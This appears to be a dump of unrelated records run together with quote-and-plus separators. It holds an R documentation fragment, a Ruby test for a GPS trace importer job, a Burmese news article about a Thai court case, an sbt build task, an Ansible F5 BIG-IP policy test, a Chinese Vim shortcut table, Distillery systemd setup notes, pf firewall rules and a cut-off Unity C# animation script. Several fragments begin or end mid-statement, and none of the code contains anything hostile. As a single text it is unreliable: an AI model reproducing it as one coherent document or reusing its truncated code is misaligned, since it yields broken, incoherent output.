\\code{getModelInfo}, regular expressions can be used.\n#' @param regex a logical: should a regular expressions be used? If\n#' \\code{FALSE}, a simple match is conducted against the whole name of the\n#' model.\n#' @param pkg" +"require \"test_helper\"\nrequire \"minitest/mock\"\n\nclass TraceImporterJobTest < ActiveJob::TestCase\n def test_success_notification\n # Check that the user gets a success notification when the trace has valid points\n trace = create(:trace)\n\n gpx = Minitest::Mock.new\n def gpx.actual_points\n 5\n end\n\n trace.stub(:import, gpx) do\n TraceImporterJob.perform_now(trace)\n end\n\n email = ActionMailer::Base.deliveries.last\n assert_equal trace.user.email, email.to[0]\n assert_match(/success/, email.subject)\n\n ActionMailer::Base.deliveries.clear\n end\n\n def test_failure_notification\n # Check that the user gets a failure notification when the trace has no valid points\n trace = create(:trace)\n\n gpx = Minitest::Mock.new\n def gpx.actual_points\n 0\n end\n\n trace.stub(:import, gpx) do\n TraceImporterJob.perform_now(trace)\n end\n\n email = ActionMailer::Base.deliveries.last\n assert_equal trace.user.email, email.to[0]\n assert_match(/failure/, email.subject)\n\n ActionMailer::Base.deliveries.clear\n end\n\n def test_error_notification\n # Check that the user gets a failure notification when something goes badly wrong\n trace = create(:trace)\n trace.stub(:import, -> { raise }) do\n TraceImporterJob.perform_now(trace)\n end\n\n email = ActionMailer::Base.deliveries.last\n assert_equal trace.user.email, email.to[0]\n assert_match(/failure/, email.subject)\n\n ActionMailer::Base.deliveries.clear\n end\nend" +"http://burmese.voanews.com/a/myanmar-ambassador-of-thailand-said-they-will-appeal-the-case-according-to-the-thai-law/3124176.html\n\n\u101c\u102d\u1015\u1039\u1000\u107d\u103c\u1014\u1039\u1038\u1021\u1019\u1088 \u1021\u101a\u1030\u1001\u1036\u1040\u1004\u1039\u1016\u102d\u102f\u1094 \u103b\u1015\u1004\u1039\u1006\u1004\u1039\n\n\u107f\u1017\u102d\u1010\u102d\u1014\u1039\u108f\u102f\u102d\u1004\u1039\u1004\u1036\u101e\u102c\u1038 \u1000\u1019\u102c\u107b\u101c\u103d\u100a\u1039\u1037\u1001\u101b\u102e\u1038\u101e\u100a\u1039\u108f\u103d\u1005\u1039\u1025\u102e\u1038\u1000\u102d\u102f \u1011\u102d\u102f\u1004\u1039\u1038\u108f\u102f\u102d\u1004\u1039\u1004\u1036 \u1031\u1000\u102c\u1037\u1031\u1010\u102c\u1004\u1039 \u1021\u1015\u1014\u1039\u1038\u1031\u103b\u1016\u1000\u107d\u103c\u1014\u1039\u1038\u1019\u103d\u102c \u101e\u1010\u1039\u1001\u1032\u1037\u1010\u101a\u1039\u1006\u102d\u102f\u1010\u1032\u1037\u1005\u103c\u1032\u1001\u103a\u1000\u1039\u1014\u1032\u1094 \u1031\u101e\u1012\u100f\u1039 \u1001\u103a\u1001\u1036\u1011\u102c\u1038\u101b\u1010\u1032\u1037 \u103b\u1019\u1014\u1039\u1019\u102c\u108f\u102f\u102d\u1004\u1039\u1004\u1036\u101e\u102c\u1038\u108f\u103d\u1005\u1039\u1025\u102e\u1038\u101b\u1032 \u1094\u1021\u1019\u1088\u1000\u102d\u102f \u1011\u102d\u102f\u1004\u1039\u1038\u108f\u102f\u102d\u1004\u1039\u1004\u1036\u101b\u1032\u1095 \u1010\u101b\u102c\u1038\u1025\u1015\u1031\u1012\u1021\u1010\u102d\u102f\u1004\u1039\u1038 \u1006\u1000\u1039\u107f\u1015\u102e\u1038 \u1021\u101a\u1030\u1001\u1036\u1040\u1004\u1039\u101e\u103c\u102c\u1038\u108f\u102d\u102f\u1004\u1039\u1016\u102d\u102f\u1094\u1021\u1010\u103c\u1000\u1039 \u1011\u102f\u102d\u1004\u1039\u1038\u108f\u102d\u102f\u1004\u1039\u1004\u1036 \u1031\u101b\u103d \u1094\u1031\u1014\u1019\u103a\u102c\u1038\u1031\u1000\u102c\u1004\u1039\u1005\u102e\u1014\u1032\u1094 \u1018\u1014\u1039\u1031\u1000\u102c\u1000\u1039\u107f\u1019\u102d\u1033 \u1094\u1000 \u103b\u1019\u1014\u1039\u1019\u102c\u101e\u1036\u1021\u1019\u1010\u1039\u1015\u102b\u1040\u1004\u1039\u1010\u1032\u1037 \u101c\u102d\u1015\u1039\u1000\u107d\u103c\u1014\u1039\u1038\u1021\u1019\u1088\u1021\u1010\u103c\u1000\u1039 \u101c\u102d\u102f\u1000\u1039\u1015\u102b\u1031\u1006\u102c\u1004\u1039\u101b\u103c\u1000\u1039\u1031\u1014\u1010\u1032\u1037 \u103b\u1019\u1014\u1039\u1019\u102c\u101e\u1036\u101b\u1036\u102f\u1038\u1021\u1011\u1030\u1038\u1031\u1000\u102c\u1039\u1019\u1010\u102e\u1010\u102d\u102f\u1094 \u1031\u1010\u103c\u1006\u1036\u102f\u1001\u1032\u1037\u107f\u1015\u102e\u1038 \u101e\u1000\u1039\u1031\u101e\u1021\u1031\u1011\u102c\u1000\u1039\u1021\u1011\u102c\u1038 \u1021\u1001\u103a\u1000\u1039\u1021\u101c\u1000\u1039 \u1005\u102f\u1031\u1006\u102c\u1004\u1039\u1038\u1016\u102d\u102f\u1094 \u1021\u1010\u103c\u1000\u1039\u103b\u1015\u1004\u1039\u1006\u1004\u1039\u1031\u1014\u107e\u1000\u1015\u102b\u1010\u101a\u1039\u104b \u1019\u1031\u1021\u1038\u1031\u1021\u1038\u1019\u102c\u1000\u101e\u1010\u1004\u1039\u1038\u1031\u1015\u1038\u1015\u102d\u102f\u1094\u1011\u102c\u1038\u1015\u102b\u1010\u101a\u1039 \u104b\n\n\u107f\u1017\u102d\u1010\u102d\u1014\u1039\u108f\u102f\u102d\u1004\u1039\u1004\u1036\u101e\u102c\u1038 \u1000\u1019\u102c\u107b\u101c\u103d\u100a\u1039\u1037\u1001\u101b\u102e\u1038\u101e\u100a\u1039\u108f\u103d\u1005\u1039\u1025\u102e\u1038\u1000\u102d\u102f \u1011\u102d\u102f\u1004\u1039\u1038\u108f\u102f\u102d\u1004\u1039\u1004\u1036 \u1031\u1000\u102c\u1037\u1031\u1010\u102c\u1004\u1039 \u1021\u1015\u1014\u1039\u1038\u1031\u103b\u1016\u1000\u107d\u103c\u1014\u1039\u1038\u1019\u103d\u102c \u101e\u1010\u1039\u1001\u1032\u1037\u1010\u101a\u1039\u1006\u102d\u102f\u1010\u1032\u1037 \u1005\u103c\u1032\u1001\u103a\u1000\u1039\u1014\u1032\u1094 \u1031\u101e\u1012\u100f\u1039 \u1001\u103a\u1001\u1036\u1011\u102c\u1038\u101b\u1010\u1032\u1037 \u103b\u1019\u1014\u1039\u1019\u102c\u108f\u102f\u102d\u1004\u1039\u1004\u1036\u101e\u102c\u1038 \u108f\u103d\u1005\u1039\u1025\u102e\u1038\u101b\u1032 \u1094 \u1021\u1019\u1088\u1014\u1032\u1094 \u1015\u1010\u1039\u101e\u1000\u1039\u101c\u102f\u102d\u1094\u101c\u102d\u1015\u1039\u1000\u107d\u103c\u1014\u1039\u1038\u1021\u1019\u1088\u1021\u1010\u103c\u1000\u1039 \u1016\u1032\u103c\u1094\u1005\u100a\u1039\u1038\u1011\u102c\u1038\u1010\u1032\u1037 \u103b\u1019\u1014\u1039\u1019\u102c\u101e\u1036\u101b\u1036\u102f\u1038\u1021\u1011\u1030\u1038\u1031\u1000\u102c\u1039\u1019\u1010\u102e\u1040\u1004\u1039\u1031\u1010\u103c \u1014\u1032\u1094 \u1011\u102f\u102d\u1004\u1039\u1038\u1031\u101b\u103d\u1095\u1031\u1014\u1019\u103a\u102c\u1038\u1031\u1000\u102c\u1004\u1039\u1005\u102e\u1014\u1032\u1094 \u1010\u102d\u102f\u1004\u1039\u1015\u1004\u1039\u1031\u1006\u103c\u1038\u1031\u108f\u103c\u1038\u1019\u1088\u1031\u1010\u103c\u101c\u102f\u1015\u1039\u1001\u1032\u1037\u1021\u107f\u1015\u102e\u1038\u1019\u103d\u102c\u1031\u1010\u102c\u1037 \u103b\u1019\u1014\u1039\u1019\u102c\u101e\u1036\u1021\u1019\u1010\u1039\u1025\u102e\u1038\u1040\u1004\u1039\u1038\u1031\u1019\u102c\u1004\u1039\u1000 \u1011\u102f\u102d\u1004\u1039\u1038\u108f\u102d\u102f\u1004\u1039\u1004\u1036\u101b\u1032\u1095 \u1010\u101b\u102c\u1038\u1025\u1015\u1031\u1012\u1021\u1010\u102f\u102d\u1004\u1039\u1038\u1006\u1000\u1039\u107f\u1015\u102e\u1038 \u1021\u101a\u1030\u1001\u1036\u1040\u1004\u1039\u101e\u103c\u102c\u1038\u1019\u101a\u1039\u101c\u102f\u102d\u1094 \u1031\u103b\u1015\u102c\u1006\u102f\u102d\u101e\u103c\u102c\u1038\u1015\u102b\u1010\u101a\u1039\u104b\n\n\u201c\u1011\u102d\u102f\u1004\u1039\u1038\u108f\u102d\u102f\u1004\u1039\u1004\u1036\u1021\u1005\u102d\u102f\u1038\u101b\u1014\u1032\u1094 \u1011\u102d\u102f\u1004\u1039\u1038\u108f\u102d\u102f\u1004\u1039\u1004\u1036\u101b\u1032\u1095 \u1025\u1015\u1031\u1012\u1021\u101b \u1011\u102d\u102f\u1004\u1039\u1038\u1040\u1014\u1039\u1080\u1000\u102e\u1038\u1001\u103a\u1033\u1015\u1039\u1000\u102d\u102f\u101a\u1039\u1010\u102d\u102f\u1004\u1039 \u1021\u101a\u1030\u1001\u1036\u1040\u1004\u1039\u108f\u102d\u102f\u1004\u1039\u1031\u107e\u1000\u102c\u1004\u1039\u1038 \u101c\u1019\u1039\u1038\u1001\u1004\u1039\u1038\u1031\u1015\u1038\u1010\u1032\u1037\u1021\u1010\u103c\u1000\u1039 \u1000\u103a\u1031\u1014\u102c\u1039\u1010\u102d\u102f\u1094 \u1006\u1000\u1039\u107f\u1015\u102e\u1038 \u1021\u101a\u1030\u1001\u1036\u1040\u1004\u1039\u107f\u1015\u102e\u1038\u1031\u1010\u102c\u1037 \u1012\u102e\u1000\u1031\u101c\u1038\u1031\u1010\u103c\u101b\u1032\u1095\u1031\u1019\u103d\u103a\u102c\u1039\u101c\u1004\u1039\u1037\u1001\u103a\u1000\u1039\u1000\u102d\u102f \u1006\u1000\u1039\u101c\u1000\u1039\u107f\u1015\u102e\u1038 \u1031\u1006\u102c\u1004\u1039\u101b\u103c\u1000\u1039\u101e\u103c\u102c\u1038\u1019\u103d\u102c\u103b\u1016\u1005\u1039\u1015\u102b\u1010\u101a\u1039\u104b\u201d\n\n\u1011\u102d\u102f\u1004\u1039\u1038\u1031\u101b\u103d \u1094\u1031\u1014\u1019\u103a\u102c\u1038\u1031\u1000\u102c\u1004\u1039\u1005\u102e\u101f\u102c \u1031\u101b\u103d \u1094\u1031\u1014 \u1041\u1041 \u1025\u102e\u1038\u1015\u102b\u1021\u1016\u1032\u103c\u1095\u1014\u1032\u1094\u103b\u1019\u1014\u1039\u1019\u102c\u101c\u1030\u1004\u101a\u1039\u1042 \u1025\u102e\u1038\u101b\u1032 \u1094\u1021\u1019\u1030\u1000\u102f\u102d \u1021\u1001\u1019\u1032\u1037 \u1031\u101b\u103d \u1094\u1031\u1014 \u101c\u102d\u102f\u1000\u1039\u1031\u1015\u1038\u1001\u1032\u1037\u107f\u1015\u102e\u1038 \u1010\u101b\u102c\u1038\u1019\u103a\u103d\u1010\u1005\u103c\u102c \u1005\u102e\u101b\u1004\u1039\u108f\u102d\u102f\u1004\u1039\u1016\u102d\u102f\u1094\u1021\u1010\u103c\u1000\u1039 \u1025\u1015\u1031\u1012\u1031\u107e\u1000\u102c\u1004\u1039\u1038\u1021\u101b \u1021\u1000\u1030\u100a\u102e\u1031\u1015\u1038\u1031\u1014\u1001\u1032\u1037\u1010\u102c\u1015\u102b\u104b \u101e\u1030\u1010\u102d\u102f\u1021\u1031\u1014\u1014\u1032\u1094 \u1001\u102d\u102f\u1004\u1039\u1019\u102c\u1010\u1032\u1037 \u101e\u1000\u1039\u1031\u101e \u1021\u1031\u1011\u102c\u1000\u1039\u1021\u1011\u102c\u1038 \u1031\u1010\u103c\u101c\u1036\u102f\u1031\u101c\u102c\u1000\u1039\u1005\u103c\u102c\u1019\u101b\u1001\u1032\u1037\u1010\u102c\u1031\u107e\u1000\u102c\u1004\u1037\u1039 \u1012\u102e\u1021\u1019\u1030\u1000\u102d\u102f \u101c\u102f\u102d\u1000\u1039\u1015\u102b\u1031\u1006\u102c\u1004\u1039\u101b\u103c\u1000\u1039\u1010\u1032\u1037\u1021\u1001\u102b\u1019\u103d\u102c \u101c\u102d\u102f\u1021\u1015\u1039\u1001\u103a\u1000\u1039\u1031\u1010\u103c\u101c\u100a\u1039\u1038\u101b\u103d\u102d\u1031\u1014\u1001\u1032\u1037\u1010\u101a\u1039\u101c\u102d\u102f\u1094 \u1006\u102d\u102f\u1015\u102b\u1010\u101a\u1039 \u104b \u1012\u102e\u1000\u1031\u1014\u1094\u1019\u103d\u102c\u1031\u1010\u102c\u1037 \u1011\u102d\u102f\u1004\u1039\u1038\u1031\u101b\u103d \u1094\u1031\u1014\u1019\u103a\u102c\u1038\u1031\u1000\u102c\u1004\u1039\u1005\u102e\u1000 \u103b\u1019\u1014\u1039\u1019\u102c\u101e\u1036\u1021\u1019\u1010\u1039\u1014\u1032\u1094 \u101c\u102d\u1015\u1039\u1000\u107d\u103c\u1014\u1039\u1038 \u1021\u1010\u103c\u1000\u1039 \u1016\u1032\u103c\u1005\u100a\u1039\u1038\u1011\u102c\u1038\u1010\u1032\u1037 \u103b\u1019\u1014\u1039\u1019\u102c\u101e\u1036\u101b\u1036\u102f\u1038\u1021\u1011\u1030\u1038\u1031\u1000\u102c\u1039\u1019\u1010\u102e\u1014\u1032\u1094 \u1031\u1010\u103c\u1006\u1036\u102f\u107f\u1015\u102e\u1038 \u103b\u1019\u1014\u1039\u1019\u102c\u101c\u1030\u1004\u101a\u1039\u1042 \u1025\u102e\u1038 \u1021\u1010\u103c\u1000\u1039 \u1021\u101a\u1030\u1001\u1036\u1006\u1000\u1039\u1010\u1000\u1039\u108f\u102d\u102f\u1004\u1039\u1016\u102d\u102f\u1094\u1025\u1015\u1031\u1012\u1031\u107e\u1000\u102c\u1004\u1039\u1038\u1021\u101b \u1006\u1000\u1039\u101c\u1000\u1039 \u101c\u102f\u1015\u1039\u1031\u1006\u102c\u1004\u1039\u108f\u102d\u102f\u1039\u1004\u1039\u1010\u1032\u1037\u1021\u1001\u103a\u1000\u1039\u1031\u1010\u103c\u1000\u102f\u102d \u1031\u1006\u103c\u1038\u1031\u108f\u103c\u1038\u1031\u103b\u1015\u102c\u1006\u102d\u102f\u1001\u1032\u1037\u1010\u101a\u1039\u1039\u101c\u102d\u102f \u101e\u1036\u101b\u1036\u102f\u1038\u1021\u1011\u1030\u1038\u1031\u1000\u102c\u1039\u1019\u1010\u102e\u1031\u1001\u102b\u1004\u1039\u1038\u1031\u1006\u102c\u1004\u1039\u103b\u1016\u1005\u1039\u1010\u1032\u1037 \u1025\u102e\u1038\u1031\u1000\u103a\u102c\u1039\u1031\u101e\u102c\u1004\u1039\u1038\u1000 \u1031\u103b\u1015\u102c\u1015\u102b\u1010\u101a\u1039\u104b\n\n\u201c\u1031\u101b\u103d \u1094\u1031\u1014\u1019\u103a\u102c\u1038\u1031\u1000\u102c\u1004\u1039\u1005\u102e \u1025\u1000\u1060\u1092\u1000 Dej Udom Krairit \u1031\u1015\u102b\u1037\u1031\u1014\u102c\u1039\u104b \u101e\u1030\u1000\u1031\u103b\u1015\u102c\u1010\u102c\u1000 \u1021\u1001\u103a\u1000\u1039 \u1043 \u1001\u103a\u1000\u1039\u1031\u103b\u1015\u102c\u1010\u101a\u1039\u104b \u1021\u101a\u1030\u1001\u1036\u1000\u102d\u1005\u1065\u1019\u103d\u102c\u1010\u1032\u1037 \u1021\u1019\u1088\u1000\u102d\u102f \u1021\u1005\u1000\u1031\u1014\u1021\u1006\u1036\u102f\u1038\u1021\u1011\u102d \u103b\u1015\u1014\u1039\u107f\u1015\u102e\u1038\u1031\u1010\u102c\u1037 \u1005\u1005\u1039\u1031\u1006\u1038\u1031\u1015\u1038\u1016\u102d\u102f\u1094 \u1031\u1010\u102c\u1004\u1039\u1038\u1006\u102d\u102f\u108f\u102d\u102f\u1004\u1039\u1005\u101b\u102c\u1000\u102d\u1005\u1065\u101b\u103d\u102d\u1010\u101a\u1039\u1010\u1032\u1037\u104b \u1021\u1032\u1012\u102b\u1031\u1010\u103c\u1000\u1031\u1010\u102c\u1037 \u1018\u102c\u101c\u1032\u1006\u102d\u102f\u1031\u1010\u102c\u1037 \u1014\u1036\u1015\u1010\u1039 \u1041 \u101e\u1000\u1039\u1031\u101e\u1001\u1036\u1031\u1010\u103c\u101f\u102c \u101c\u103c\u1032\u1019\u103d\u102c\u1038\u1010\u101a\u1039\u104b \u101e\u1000\u1039\u1031\u101e\u1031\u1010\u103c\u101c\u100a\u1039\u1038\u101c\u103c\u1032\u1019\u103d\u102c\u1038\u1010\u101a\u1039\u1006\u102d\u102f\u107f\u1015\u102e\u1038\u1031\u1010\u102c\u1037 \u1000\u103a\u1031\u1014\u102c\u1039\u1010\u102d\u102f\u1094\u1018\u1000\u1039\u1000 \u1010\u101b\u102c\u1038\u1001\u1036\u1018\u1000\u1039\u1000 \u1031\u1001\u103a\u1015\u108f\u102d\u102f\u1004\u1039\u1010\u1032\u1037\u1021\u1001\u103a\u1000\u1039\u1021\u101c\u1000\u1039\u101b\u103d\u102d\u101b\u1004\u1039 \u1010\u1004\u1039\u103b\u1015\u101c\u102d\u102f\u1094\u101b\u1010\u101a\u1039\u1010\u1032\u1037\u104b \u1014\u1036\u1015\u1010\u1039 \u1042 \u1021\u1001\u103a\u1000\u1039\u1000\u1031\u1010\u102c\u1037 \u1015\u1005\u1065\u100a\u1039\u1038\u101e\u1000\u1039\u1031\u101e\u1031\u1010\u103c\u101f\u102c \u1021\u1010\u102f\u1021\u1015\u1031\u1010\u103c\u103b\u1016\u1005\u1039\u1031\u1014\u1010\u101a\u1039\u104b \u1021\u1005\u1005\u1039\u1021\u1019\u103d\u1014\u1039\u1019\u101f\u102f\u1010\u1039\u1018\u1030\u1038\u104b \u1031\u1014\u102c\u1000\u1039\u107f\u1015\u102e\u1038\u1031\u1010\u102c\u1037 \u1010\u1004\u1039\u103b\u1015\u1010\u1032\u1037\u1021\u1001\u103a\u1000\u1039\u1021\u101c\u1000\u1039\u1031\u1010\u103c\u1000\u101c\u100a\u1039\u1038 \u1021\u1019\u103d\u102c\u1038\u1021\u101a\u103c\u1004\u1039\u1038\u1031\u1010\u103c\u103b\u1016\u1005\u1039\u1031\u1014\u1010\u101a\u1039\u1006\u102d\u102f\u101c\u102d\u102f\u1094\u101b\u103d\u102d\u101b\u1004\u1039\u101c\u100a\u1039\u1038 \u103b\u1015\u1014\u1039\u107f\u1015\u102e\u1038\u1031\u1010\u102c\u1037\u1019\u103d \u1021\u1019\u1088\u1000\u102d\u102f \u1021\u1005\u1021\u1006\u1036\u102f\u1038\u103b\u1015\u1014\u1039\u107f\u1015\u102e\u1038\u1031\u1010\u102c\u1037 \u1005\u1005\u1039\u1031\u1006\u1038 \u101c\u102d\u102f\u1094\u101b\u1015\u102b\u1010\u101a\u1039\u104b \u1014\u1036\u1015\u1010\u1039 \u1043 \u1021\u1001\u103a\u1000\u1039\u1000 \u1011\u1015\u1039\u107f\u1015\u102e\u1038\u1031\u1010\u102c\u1037 \u1010\u1004\u1039\u103b\u1015\u108f\u102d\u102f\u1004\u1039\u1010\u1032\u1037 \u101e\u1000\u1039\u1031\u101e\u1031\u1010\u103c \u1015\u1005\u1065\u100a\u1039\u1038\u1031\u1010\u103c\u104a \u101e\u1000\u1039\u1031\u101e\u1000 \u101e\u1000\u1039\u1019\u1032\u1037\u104a\u101e\u1000\u1039\u101b\u103d\u102d \u101e\u1000\u1039\u1031\u101e\u1031\u1010\u103c \u101b\u103d\u102d\u1001\u1032\u1037\u101b\u1004\u1039 \u1012\u102e\u1021\u1001\u103a\u1000\u1039 \u1043 \u1001\u103a\u1000\u1039\u1011\u1032\u1000 \u1010\u1001\u103a\u1000\u1039\u1001\u103a\u1000\u1039 \u1000\u102d\u102f\u101a\u1039\u1037\u1018\u1000\u1039\u1000 \u1031\u1011\u102c\u1000\u1039\u103b\u1015\u108f\u102d\u102f\u1004\u1039\u1005\u101b\u102c \u1031\u103b\u1015\u102c\u108f\u102d\u102f\u1004\u1039\u1005\u101b\u102c\u101b\u103d\u102d\u101b\u1004\u1039 \u1012\u102e\u1021\u1019\u1088\u1000\u102d\u102f \u1021\u1005\u1021\u1006\u1036\u102f\u1038\u1011\u102d\u103b\u1015\u1014\u1039\u107f\u1015\u102e\u1038\u1031\u1010\u102c\u1037 \u1005\u1005\u1039\u1031\u1006\u1038\u1001\u103c\u1004\u1039\u1037\u1010\u1004\u1039\u101c\u102d\u102f\u1094\u101b\u1015\u102b\u1010\u101a\u1039\u1010\u1032\u1037\u104b \u1012\u102e\u1021\u1001\u103a\u1000\u1039 \u1043 \u1001\u103a\u1000\u1039\u1011\u1032\u1019\u103d\u102c \u1010\u1001\u102f\u1001\u102f\u1031\u1010\u102c\u1004\u1039\u101c\u100a\u1039\u1038\u1031\u1000\u102c\u1004\u1039\u1038 \u104a \u1021\u1001\u103a\u1000\u1039 \u1042 \u1001\u103a\u1000\u1039\u1031\u101e\u102c\u1039\u101c\u100a\u1039\u1038\u1031\u1000\u102c\u1004\u1039\u1038\u104a \u1021\u1001\u103a\u1000\u1039 \u1043 \u1001\u103a\u1000\u1039\u1031\u101e\u102c\u1039\u101c\u100a\u1039\u1038\u1031\u1000\u102c\u1004\u1039\u1038 \u104a \u1010\u1001\u102f\u1001\u102f\u101b\u103d\u102d\u1001\u1032\u1037\u101c\u102d\u102f\u1094\u101b\u103d\u102d\u101b\u1004\u1039 \u1019\u102d\u101e\u102c\u1038\u1005\u102f\u1040\u1004\u1039\u1010\u1025\u102e\u1038\u1025\u102e\u1038\u1000 \u103b\u1015\u1014\u1039\u107f\u1015\u102e\u1038\u1031\u1010\u102c\u1037 \u1012\u102e\u1021\u1019\u1088\u1000\u102d\u1005\u1065\u1000\u102d\u102f \u103b\u1015\u1014\u1039\u101c\u100a\u1039\u1005\u1005\u1039\u1031\u1006\u1038\u1031\u1015\u1038\u1016\u102d\u102f\u1094\u1021\u1010\u103c\u1000\u1039 \u1031\u1010\u102c\u1004\u1039\u1038\u1006\u102d\u102f\u101c\u102d\u102f\u1094\u101b\u1015\u102b\u1010\u101a\u1039\u1010\u1032\u1037\u104b\u201d\n\n\u101b\u1014\u1039\u1000\u102f\u1014\u1039\u1021\u1015\u102b\u1021\u1040\u1004\u1039 \u1014\u101a\u1039\u1005\u1015\u1039\u107f\u1019\u102d\u1033\u1095\u1031\u1010\u103c\u1019\u103d\u102c\u1031\u1010\u102c\u1037 \u103b\u1019\u1014\u1039\u1019\u102c\u108f\u102f\u102d\u1004\u1039\u1004\u1036\u101e\u102c\u1038\u101c\u1030\u1004\u101a\u1039 \u1042" +"///\n/// I18n\n///\n\n// path handling details are inelegant/repetitive, should be cleaned up - ST 5/30/12\n\nresourceGenerators in Compile += Def.task {\n val names: Set[String] =\n IO.listFiles(baseDirectory.value / \"i18n\")\n .map(_.getName)\n .filter(_.endsWith(\".txt\"))\n .map(_.stripSuffix(\".txt\"))\n .toSet\n val s = streams.value\n val cache =\n FileFunction.cached(s.cacheDirectory / \"native2ascii\",\n inStyle = FilesInfo.hash, outStyle = FilesInfo.hash) {\n in: Set[File] =>\n names.map{ name =>\n s.log.info(s\"native2ascii: $name\")\n native2ascii(resourceManaged.value, baseDirectory.value / \"i18n\", name)\n }\n }\n cache(names.map(name => baseDirectory.value / \"i18n\" / (name + \".txt\"))).toSeq\n}.taskValue\n\ndef native2ascii(dir: File, i18nDir: File, name: String): File = {\n val in = i18nDir / (name + \".txt\")\n val result = dir / (name + \".properties\")\n IO.createDirectory(dir)\n (new sun.tools.native2ascii.Main).convert(\n Array(\"-encoding\", \"UTF-8\", in.getPath, result.getPath))\n result\n}" +"---\n\n- name: Issue 01321 - Create published policy\n bigip_policy:\n name: issue-01321\n\n- name: Issue 01321 - Create published rule with actions and conditions\n bigip_policy_rule:\n policy: issue-01321\n name: rule1\n conditions:\n - type: http_host\n host_begins_with_any:\n - foo.bar.com\n - baz.cool.com\n actions:\n - type: redirect\n location: tcl:https://[getfield [HTTP::host] \\\":\\\" 1][HTTP::uri]\n\n- name: Issue 01321 - Select LTM policy facts\n bigip_device_info:\n gather_subset:\n - ltm-policies\n register: result\n\n- name: Issue 01191 - Assert Select LTM policy facts\n assert:\n that:\n - result is success\n - result.ltm_policies | json_query(\"[?name=='issue-01321'].rules[].name\") | first == \"rule1\"\n - result.ltm_policies | json_query(\"[?name=='issue-01321'].rules[].actions[].location\") | first == \"tcl:https://[getfield [HTTP::host] \\\\\\\":\\\\\\\" 1][HTTP::uri]\"\n - result.ltm_policies | json_query(\"[?name=='issue-01321'].rules[].conditions[].values[0]\") | first == \"foo.bar.com\"\n\n- name: Issue 01321 - Remove published policy\n bigip_policy:\n name: issue-01321\n state: absent" +"# VIM\u64cd\u4f5c\u901f\u8bb0\n\n\n| \u547d\u4ee4 | \u5feb\u6377\u952e | \u64cd\u4f5c\u8bf4\u660e |\n| --- | --- | --- |\n| | Ctrl-w w | \u5149\u6807\u5728\u7a97\u53e3\u4e4b\u95f4\u5207\u6362 |\n| | Ctrl-w h, j, k, l | \u5149\u6807\u5728\u7a97\u53e3\u4e4b\u95f4\u5207\u6362 |\n| | Ctrl-w r | \u5207\u6362\u5f53\u524d\u7a97\u53e3\u5e03\u5c40\u4f4d\u7f6e |\n| | Ctrl-w p | \u5207\u6362\u5230\u524d\u4e00\u4e2a\u7a97\u53e3 | \n| :help table | | tab\u4f7f\u7528\u5e2e\u52a9 |\n| :tabp | gt | \u524d\u4e00\u4e2atab\u9875 |\n| :tabn | gT | \u540e\u4e00\u4e2atab\u9875 |\n| :tabc | | \u5173\u95ed\u5f53\u524dtab |\n| :tabo | | \u5173\u95ed\u5176\u4ed6tab |\n| :tabs | | \u67e5\u770b\u6240\u6709\u6253\u5f00\u7684tab |\n| :split | | \u7a97\u53e3\u6a2a\u5411\u62c6\u5206 |\n| :vsplit | | \u7a97\u53e3\u7eb5\u5411\u62c6\u5206 |\n| | Ctrl-w = | \u8ba9\u6240\u6709\u7a97\u53e3\u5747\u5206 |\n| :resize (-/+)n | Ctrl-w -/+ | \u5f53\u524d\u7a97\u53e3\u51cf\u5c11/\u589e\u52a0\u4e00\uff08n\uff09\u884c |\n| :vertical resize (+/-)n | Ctrl-w >/< | \u5f53\u524d\u7a97\u53e3\u589e\u52a0\u3001\u51cf\u5c11\u4e00\uff08n\uff09\u5217 |\n\n\n\n## nerdtree\n\n\n| \u547d\u4ee4 | \u5feb\u6377\u952e | \u64cd\u4f5c\u8bf4\u660e |\n| --- | --- | --- |\n| :NERDTreeToggle | Ctrl-n | \u6253\u5f00\u3001\u5173\u95ed\u5de6\u4fa7\u5bfc\u822a\u680f |\n| | t | \u5728\u65b0\u7684Tab\u4e2d\u6253\u5f00\u6587\u4ef6 |\n| | i | \u6a2a\u5411\u5206\u5c4f\u6253\u5f00\u6587\u4ef6 |\n| | s | \u7eb5\u5411\u5206\u5c4f\u6253\u5f00\u6587\u4ef6 |\n| | p | \u8df3\u5230\u5f53\u524d\u8282\u70b9\u7684\u7236\u8282\u70b9 |\n| | P | \u8df3\u5230\u5f53\u524d\u8282\u70b9\u7684\u6839\u8282\u70b9 |\n\n\u6587\u6863\uff1ahttps://github.com/scrooloose/nerdtree/blob/master/doc/NERDTree.txt\n\n## vim-go\n\n\n| \u547d\u4ee4 | \u5feb\u6377\u952e | \u64cd\u4f5c\u8bf4\u660e |\n| --- | --- | --- |\n| :GoDef | Ctrl-] | \u8f6c\u5230\u5b9a\u4e49" +"# Using Distillery with systemd\n\n!!! warning\n You need to be aware that when running `bin/myapp upgrade <version>`,\n this command will be executed in the *callers* environment, not\n the environment defined by the systemd unit. If you need environment\n variables to be available during the upgrade, then you need to either\n execute it with the same environment as the systemd unit, or export those\n environment variables in the calling environment.\n\nHere are two general approaches to running a Distillery release with systemd:\n\n## Run app as daemon using `start` and a `forking` Systemd service *with* pidfile\n\nProperties of this approach:\n\n * Your app will be automatically restarted if it crashes\n * Logs will be written to the `var/log` directory in your release\n * If your app is killed suddenly (on Linux this would mean receiving a `SIGKILL`,as used by \"OOM Killer\") then your app may not get a chance to remove the pidfile and so it may not be restarted. If this is a concern kill your app with `pkill -9 beam.smp` and ensure that the pifile is removed and that the systemd detects strats it again.\n\n```systemd\n[Unit]\nDescription=My App\nAfter=network.target\n\n[Service]\nType=forking\nUser=appuser\nGroup=appuser\nWorkingDirectory=/home/appuser/myapp\nExecStart=/home/appuser/myapp/bin/myapp start\nExecStop=/home/appuser/myapp/bin/myapp" +"block drop all\nblock return all\nblock return-rst proto tcp all\npass all flags S/SA\npass in all no state\npass out all no state\npass all no state\nblock drop in all\nblock drop out all\nblock drop all\npass in all flags S/SA\npass out all flags S/SA\nblock drop on lo0 all\npass on lo0 all flags S/SA\nblock drop on lo0 all\npass proto tcp all flags S/SA\npass proto udp all\npass in proto udp all\npass out proto udp all\npass out on lo0 proto tcp from any to any port = 25 flags S/SA" +"using UnityEngine;\nusing System.Collections;\n\n[RequireComponent (typeof (ThirdPersonController))]\npublic class AnimationController : MonoBehaviour\n{\n\tenum CharacterState\n\t{\n\t\tNormal,\n\t\tJumping,\n\t\tFalling,\n\t\tLanding\n\t}\n\t\n\t\n\tpublic Animation target;\n\t\t// The animation component being controlled\n\tnew public Rigidbody rigidbody;\n\t\t// The rigidbody movement is read from\n\tpublic Transform root, spine, hub;\n\t\t// The animated transforms used for lower body rotation\n\tpublic float\n\t\twalkSpeed = 